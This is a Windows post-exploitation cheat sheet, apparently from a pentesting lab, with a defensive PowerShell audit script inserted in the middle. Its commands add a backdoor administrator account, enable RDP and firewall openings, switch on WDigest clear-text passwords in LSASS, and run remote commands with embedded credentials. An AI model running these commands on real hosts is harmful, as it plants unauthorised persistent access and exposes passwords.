Backdoor User
net user backdoor backdoor123 /add
net localgroup administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add
Enabling RDP
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=udp
(The doubled %%SystemRoot%% is the batch-file form used by that script; at an interactive cmd prompt it is %SystemRoot%.)
OR (meterpreter):
run post/windows/manage/enable_rdp
https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
Dumping Credentials
https://adsecurity.org/?page_id=1821
In order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential” (DWORD)
This registry key is worth monitoring in your environment, since an attacker may want to set it to 1 to enable Digest password support, which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem.
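The following audit script is an added example and is not part of the original cheat sheet or of any of the tools it references. It reads back the host settings that the commands in the "Backdoor User", "Enabling RDP" and "Dumping Credentials" sections change (local Administrators and Remote Desktop Users membership, fDenyTSConnections, the TermService start mode, the "Remote Desktop - User Mode (TCP-In)" firewall rule, and the WDigest UseLogonCredential value), so a defender can baseline a host or confirm a suspected change. It assumes an elevated Windows PowerShell 3.0 or newer session and an English netsh, whose "Enabled:" output line it parses; the function names are my own.

```powershell
# Added audit example (not from the original page). Reports the settings the
# cheat sheet's commands modify. Assumes elevated Windows PowerShell 3.0+ and
# English netsh output.

function Get-LocalGroupMemberNames {
    param([string]$GroupName)
    # The WinNT ADSI provider is available on every Windows version the page covers
    $group = [ADSI]"WinNT://$env:COMPUTERNAME/$GroupName,group"
    @($group.Invoke('Members')) | ForEach-Object {
        $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)
    }
}

function Get-RegistryDword {
    param([string]$Path, [string]$Name)
    # Returns $null when the value does not exist, which matters for WDigest
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Invoke-RdpBackdoorAudit {
    $findings = @()

    # 1. Who holds local admin or RDP logon rights ("Backdoor User" section)
    foreach ($g in 'Administrators', 'Remote Desktop Users') {
        $members = (Get-LocalGroupMemberNames -GroupName $g) -join ', '
        $findings += [pscustomobject]@{ Check = "Members of $g"; Value = $members; Note = 'Compare against your baseline' }
    }

    # 2. RDP state ("Enabling RDP" section)
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny = Get-RegistryDword -Path $ts -Name 'fDenyTSConnections'
    $denyNote = if ($deny -eq 0) { 'RDP connections allowed' } else { 'RDP connections denied' }
    $findings += [pscustomobject]@{ Check = 'fDenyTSConnections'; Value = $deny; Note = $denyNote }

    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='TermService'"
    $findings += [pscustomobject]@{ Check = 'TermService'; Value = "$($svc.State) / start=$($svc.StartMode)"; Note = 'Page sets start=auto and starts it' }

    # --% passes the rest of the line to netsh verbatim (PowerShell 3.0+)
    $rule = netsh.exe --% advfirewall firewall show rule name="Remote Desktop - User Mode (TCP-In)"
    $ruleEnabled = $rule | Select-String -Pattern '^Enabled:\s+Yes' -Quiet
    $ruleValue = if ($ruleEnabled) { 'enabled' } else { 'absent or disabled' }
    $findings += [pscustomobject]@{ Check = 'Firewall rule: Remote Desktop - User Mode (TCP-In)'; Value = $ruleValue; Note = 'Inbound TCP 3389' }

    # 3. WDigest ("Dumping Credentials" section); 6.3 = Windows 8.1 / 2012 R2
    $osVersion = [version](Get-CimInstance -ClassName Win32_OperatingSystem).Version
    $newerOs = $osVersion -ge [version]'6.3'
    $wd = Get-RegistryDword -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential'
    if ($null -eq $wd) {
        $wdNote = if ($newerOs) { 'Absent: the expected default on 8.1/2012 R2 and newer' }
                  else { 'Absent: set it to 0 on 7/2008 R2 to keep clear-text passwords out of LSASS' }
        $wdValue = '<absent>'
    } elseif ($wd -eq 1) {
        $wdNote = 'ALERT: Digest enabled, clear-text passwords are placed in LSASS'
        $wdValue = $wd
    } else {
        $wdNote = if ($newerOs) { 'Value is 0, but it is not present by default on this OS: check who created it' }
                  else { 'Digest disabled' }
        $wdValue = $wd
    }
    $findings += [pscustomobject]@{ Check = 'WDigest UseLogonCredential'; Value = $wdValue; Note = $wdNote }

    return $findings
}

Invoke-RdpBackdoorAudit | Format-Table -AutoSize -Wrap
```

Run it from an elevated prompt on the host and keep the output with the host's baseline; the only line that is an alert on its own is UseLogonCredential = 1, while the others are meant to be diffed against what the host looked like before.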
Remote Commands
winexe --user=backdoor%laKK195@19z //10.11.1.218 ipconfig
winexe --user=backdoor%laKK195@19z --system //10.11.1.218 cmd
OR
psexec (from Windows)
OR
nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>